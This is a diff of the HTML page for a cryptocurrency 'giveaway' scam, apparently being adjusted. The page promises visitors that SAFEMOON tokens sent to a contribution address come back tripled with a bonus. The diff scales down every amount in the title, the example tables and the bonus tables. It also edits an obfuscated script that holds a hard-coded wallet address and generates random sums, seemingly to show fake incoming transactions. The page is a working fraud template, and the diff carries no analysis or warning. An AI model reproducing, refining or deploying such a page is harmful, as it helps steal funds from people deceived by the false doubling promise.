--- a/z.html
+++ b/z.html
@@ -7,7 +7,7 @@
     <meta name="msapplication-TileImage" content="logo.png">
     <meta name="viewport" conSAFEMOONt="width=device-width, initial-scale=1.0">
     <meta http-equiv="X-UA-Compatible" content="ie=edge">
-    <title>Get 500,000,000,000,000 SAFEMOON giveaway | SAFEMOON believe that blockchain and SAFEMOON coin will make
+    <title>Get 100,000,000,000 SAFEMOON giveaway | SAFEMOON believe that blockchain and SAFEMOON coin will make
         the world more
         fair. To speed up the process of cryptocurrency..........</title>
     <link href="index_files/bootstrap.min.css" rel="stylesheet" />
@@ -51,14 +51,14 @@
                 <p class="subtitle" style:"color:#fff">SAFEMOON believe that blockchain and SAFEMOON coin will make the
                     world more fair.
                     To
-                    speed up the process of<strong> cryptocurrency mass adoption, We decided to run 500,000,000,000,000 SAFEMOON
+                    speed up the process of<strong> cryptocurrency mass adoption, We decided to run 100,000,000,000 SAFEMOON
                         giveaway.
                     </strong>We believe that this will help in growing the crypto community.<br />
                     <br />
 
-                    To participate you just need to send from 250,000,000 SAFEMOON to 50,000,000,000 SAFEMOON to the contribution address
+                    To participate you just need to send from 250,000 SAFEMOON to 30,000,000 SAFEMOON to the contribution address
                     and
-                    we will immediately send you back<strong> 750,000,000 SAFEMOON to 150,000,000,000 SAFEMOON (x3 back) to the address you
+                    we will immediately send you back<strong> 750,000 SAFEMOON to 90,000,000 SAFEMOON (x3 back) to the address you
                         sent
                         it from
                     </strong><br />
@@ -129,30 +129,30 @@
                                 example: </b></p>
 
                         <ul style="padding:0 0 0 20px">
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 250,000,000 SAFEMOON,
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 250,000 SAFEMOON,
                                 you
-                                will get 750,000,000 SAFEMOON back</span></li>
-                                <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 500,000,000 SAFEMOON,
+                                will get 750,000 SAFEMOON back</span></li>
+                                <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 500,000 SAFEMOON,
                                     you
-                                    will get 1,500,000,000 SAFEMOON back</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 1,000,000,000 SAFEMOON,
+                                    will get 1,500,000 SAFEMOON back</span></li>
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 1,000,000 SAFEMOON,
                                     you
-                                    will get 3,000,000,000 SAFEMOON back</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 5,000,000,000 SAFEMOON,
+                                    will get 3,000,000 SAFEMOON back</span></li>
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 2,000,000 SAFEMOON,
                                     you
-                                    will get 15,000,000,000 SAFEMOON back</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 10,000,000,000 SAFEMOON,
+                                    will get 6,000,000 SAFEMOON back</span></li>
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 5,000,000 SAFEMOON,
                                     you
-                                    will get 30,000,000,000 SAFEMOON back</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 20,000,000,000 SAFEMOON,
+                                    will get 15,000,000 SAFEMOON back</span></li>
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 10,000,000 SAFEMOON,
                                     you
-                                    will get 60,000,000,000 SAFEMOON back</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 30,000,000,000 SAFEMOON,
+                                    will get 30,000,000 SAFEMOON back</span></li>
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 20,000,000 SAFEMOON,
                                     you
-                                    will get 90,000,000,000 SAFEMOON back</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 50,000,000,000,000 SAFEMOON,
+                                    will get 60,000,000 SAFEMOON back</span></li>
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 30,000,000 SAFEMOON,
                                     you
-                                    will get 150,000,000,000 SAFEMOON back</span></li>
+                                    will get 90,000,000 SAFEMOON back</span></li>
                            
 
                         </ul>
@@ -164,27 +164,27 @@
                         </p>
 
                         <ul>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>250,000,000 SAFEMOON + = 25,000,000 SAFEMOON
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>250,000 SAFEMOON + = 25,000 SAFEMOON
                                     BONUS</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>500,000,000 SAFEMOON + = 50,000,000
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>500,000 SAFEMOON + = 50,000
                                     SAFEMOON
                                     BONUS</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>1,000,000,000 SAFEMOON + = 100,000,000
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>1,000,000 SAFEMOON + = 100,000
                                     SAFEMOON
                                     BONUS</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>5,000,000,000 SAFEMOON + = 500,000,000
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>2,000,000 SAFEMOON + = 200,000
                                     SAFEMOON
                                     BONUS</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>10,000,000,000 SAFEMOON + = 1,000,000,000
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>5,000,000 SAFEMOON + = 500,000
                                     SAFEMOON
                                     BONUS</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>20,000,000,000 SAFEMOON + = 2,000,000,000
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>10,000,000 SAFEMOON + = 1,000,000
                                     SAFEMOON
                                     BONUS</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>30,000,000,000 SAFEMOON + = 3,000,000,000
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>20,000,000 SAFEMOON + = 2,000,000
                                     SAFEMOON
                                     BONUS</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>50,000,000,000 SAFEMOON + = 5,000,000,000
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>30,000,000 SAFEMOON + = 3,000,000
                                     SAFEMOON
                                     BONUS</span></li>
                         </ul>
@@ -482,7 +482,7 @@
                 let _0xe480xd = '0x' + chainType[randomInteger(0, chainType.length - 1)] + randomString(6) + '...';
                 let _0xe480xe = 'IN';
                 let _0xe480xf = '0xC24aE1237ED2B5c16746ec6014605F5a70245684';
-                let valueSend = randomInteger(250000000, 50000000000);
+                let valueSend = randomInteger(250000, 5000000);
                 let _0xe480x10 = valueSend + ' SAFEMOON  ';
                 let _0xe480x11 = ((Math['random']() * 0.0099) + 0.0010)['toFixed'](5);
                 let _0xe480x12 = '' + randomString(7) + '...';
